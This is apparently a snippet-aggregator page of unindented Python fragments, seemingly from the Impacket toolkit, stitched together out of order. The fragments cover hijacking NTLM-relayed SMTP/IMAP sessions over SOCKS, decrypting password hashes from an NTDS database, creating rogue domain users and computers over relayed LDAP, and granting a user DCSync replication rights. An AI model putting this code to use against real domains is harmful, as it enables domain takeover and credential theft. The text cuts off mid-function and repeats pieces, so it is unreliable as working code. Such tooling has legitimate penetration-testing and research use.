Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
self.socksSocket.send('334 VXNlcm5hbWU6'+EOL)
# Client will now send their AUTH
data = self.socksSocket.recv(self.packetSize)
# This contains base64(username), decode
creds = base64.b64decode(data.strip())
self.username = creds.upper()
# Client will now send the password, we don't care for it but receive it anyway
self.socksSocket.send('334 UGFzc3dvcmQ6'+EOL)
data = self.socksSocket.recv(self.packetSize)
elif cmd.upper() == 'AUTH' and args[0] == 'PLAIN':
# Simple login
# This contains base64(\x00username\x00password), decode and split
creds = base64.b64decode(args[1].strip())
self.username = creds.split('\x00')[1].upper()
else:
LOG.error('SMTP: Socks plugin expected AUTH PLAIN or AUTH LOGIN command, but got: %s %s' % (cmd, params))
return False
# Check if we have a connection for the user
if self.activeRelays.has_key(self.username):
# Check the connection is not inUse
if self.activeRelays[self.username]['inUse'] is True:
LOG.error('SMTP: Connection for %s@%s(%s) is being used at the moment!' % (
self.username, self.targetHost, self.targetPort))
return False
else:
LOG.info('SMTP: Proxying client session for %s@%s(%s)' % (
self.username, self.targetHost, self.targetPort))
self.session = self.activeRelays[self.username]['protocolClient'].session
else:
LOG.error('SMTP: No session for %s@%s(%s) available' % (
self.username, self.targetHost, self.targetPort))
data = self.socksSocket.recv(self.packetSize)
# This contains base64(\x00username\x00password), decode and split
creds = base64.b64decode(data.strip())
self.username = creds.split('\x00')[1].upper()
elif args[0].upper() == 'LOGIN':
# Simple login
self.username = args[1].upper()
else:
LOG.error('IMAP: Socks plugin expected LOGIN or AUTHENTICATE PLAIN command, but got: %s' % cmd)
return False
# Check if we have a connection for the user
if self.activeRelays.has_key(self.username):
# Check the connection is not inUse
if self.activeRelays[self.username]['inUse'] is True:
LOG.error('IMAP: Connection for %s@%s(%s) is being used at the moment!' % (
self.username, self.targetHost, self.targetPort))
return False
else:
LOG.info('IMAP: Proxying client session for %s@%s(%s)' % (
self.username, self.targetHost, self.targetPort))
self.session = self.activeRelays[self.username]['protocolClient'].session
else:
LOG.error('IMAP: No session for %s@%s(%s) available' % (
self.username, self.targetHost, self.targetPort))
return False
# We arrived here, that means all is OK
self.socksSocket.sendall('%s OK %s completed.%s' % (tag, args[0].upper(), EOL))
self.relaySocket = self.session.sock
self.relaySocketFile = self.session.file
return True
ntCreate['Parameters']['FileNameLength']= len(packetPathName)
ntCreate['Parameters']['AccessMask'] = desiredAccess
ntCreate['Parameters']['FileAttributes']= fileAttributes
ntCreate['Parameters']['ShareAccess'] = shareMode
ntCreate['Parameters']['Disposition'] = creationDisposition
ntCreate['Parameters']['CreateOptions'] = creationOption
ntCreate['Parameters']['Impersonation'] = impersonationLevel
ntCreate['Parameters']['SecurityFlags'] = securityFlags
ntCreate['Parameters']['CreateFlags'] = 0x16
ntCreate['Data']['FileName'] = packetPathName
if flags2 & smb.SMB.FLAGS2_UNICODE:
ntCreate['Data']['Pad'] = 0x0
if createContexts is not None:
LOG.error("CreateContexts not supported in SMB1")
try:
return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate)
except (smb.SessionError, smb3.SessionError) as e:
raise SessionError(e.get_error_code(), e.get_error_packet())
else:
try:
return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
creationDisposition, fileAttributes, impersonationLevel,
securityFlags, oplockLevel, createContexts)
except (smb.SessionError, smb3.SessionError) as e:
raise SessionError(e.get_error_code(), e.get_error_packet())
for record in self.__tmpUsers:
try:
self.__decryptHash(record, outputFile=hashesOutputFile)
if self.__justNTLM is False:
self.__decryptSupplementalInfo(record, None, keysOutputFile, clearTextOutputFile)
except Exception, e:
if logging.getLogger().level == logging.DEBUG:
import traceback
print traceback.print_exc()
try:
LOG.error(
"Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
LOG.error(str(e))
pass
except:
LOG.error("Error while processing row!")
LOG.error(str(e))
pass
# Now let's keep moving through the NTDS file and decrypting what we find
while True:
try:
record = self.__ESEDB.getNextRow(self.__cursor)
except:
LOG.error('Error while calling getNextRow(), trying the next one')
continue
if record is None:
break
try:
if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
self.__decryptHash(record, outputFile=hashesOutputFile)
'cn': newUser,
'sn': newUser,
'givenName': newUser,
'displayName': newUser,
'name': newUser,
'userAccountControl': 512,
'accountExpires': '0',
'sAMAccountName': newUser,
'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le')
}
LOG.info('Attempting to create user in: %s', parent)
res = self.client.add(newUserDn, ['top', 'person', 'organizationalPerson', 'user'], ucd)
if not res:
# Adding users requires LDAPS
if self.client.result['result'] == RESULT_UNWILLING_TO_PERFORM and not self.client.server.ssl:
LOG.error('Failed to add a new user. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing user.')
else:
LOG.error('Failed to add a new user: %s' % str(self.client.result))
return False
else:
LOG.info('Adding new user with username: %s and password: %s result: OK' % (newUser, newPassword))
# Return the DN
return newUserDn
def initConnection(self):
self.session = smtplib.SMTP(self.targetHost,self.targetPort)
# Turn on to debug SMTP messages
# self.session.debuglevel = 3
self.session.ehlo()
if 'AUTH NTLM' not in self.session.ehlo_resp:
LOG.error('SMTP server does not support NTLM authentication!')
return False
return True
def addComputer(self, parent, domainDumper):
"""
Add a new computer. Parent is preferably CN=computers,DC=Domain,DC=local, but can
also be an OU or other container where we have write privileges
"""
global alreadyAddedComputer
if alreadyAddedComputer:
LOG.error('New computer already added. Refusing to add another')
return
# Random password
newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
# Get the domain we are in
domaindn = domainDumper.root
domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
computerName = self.computerName
if computerName == '':
# Random computername
newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
else:
newComputer = computerName if computerName.endswith('$') else computerName + '$'
def get_address(self):
address = get_bytes( self.buffer, 5, self.get_address_length() )
if self.get_protocol()==AddressDetails.PROTOCOL_IP:
return socket.inet_ntoa(address)
else:
LOG.error("Address not IP")
return address
def addUser(self, parent, domainDumper):
"""
Add a new user. Parent is preferably CN=Users,DC=Domain,DC=local, but can
also be an OU or other container where we have write privileges
"""
global alreadyEscalated
if alreadyEscalated:
LOG.error('New user already added. Refusing to add another')
return
# Random password
newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
# Random username
newUser = ''.join(random.choice(string.ascii_letters) for _ in range(10))
newUserDn = 'CN=%s,%s' % (newUser, parent)
ucd = {
'objectCategory': 'CN=Person,CN=Schema,CN=Configuration,%s' % domainDumper.root,
'distinguishedName': newUserDn,
'cn': newUser,
'sn': newUser,
'givenName': newUser,
'displayName': newUser,
'name': newUser,
alreadyEscalated = True
LOG.info('Success! User %s now has Replication-Get-Changes-All privileges on the domain', username)
LOG.info('Try using DCSync with secretsdump.py and this user :)')
# Query the SD again to see what AD made of it
self.client.search(domainDumper.root, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = self.client.entries[0]
newSD = entry['nTSecurityDescriptor'].raw_values[0]
# Save this to restore the SD later on
restoredata['target_dn'] = dn
restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
restoredata['success'] = True
self.writeRestoreData(restoredata, dn)
return True
else:
LOG.error('Error when updating ACL: %s' % self.client.result)
return False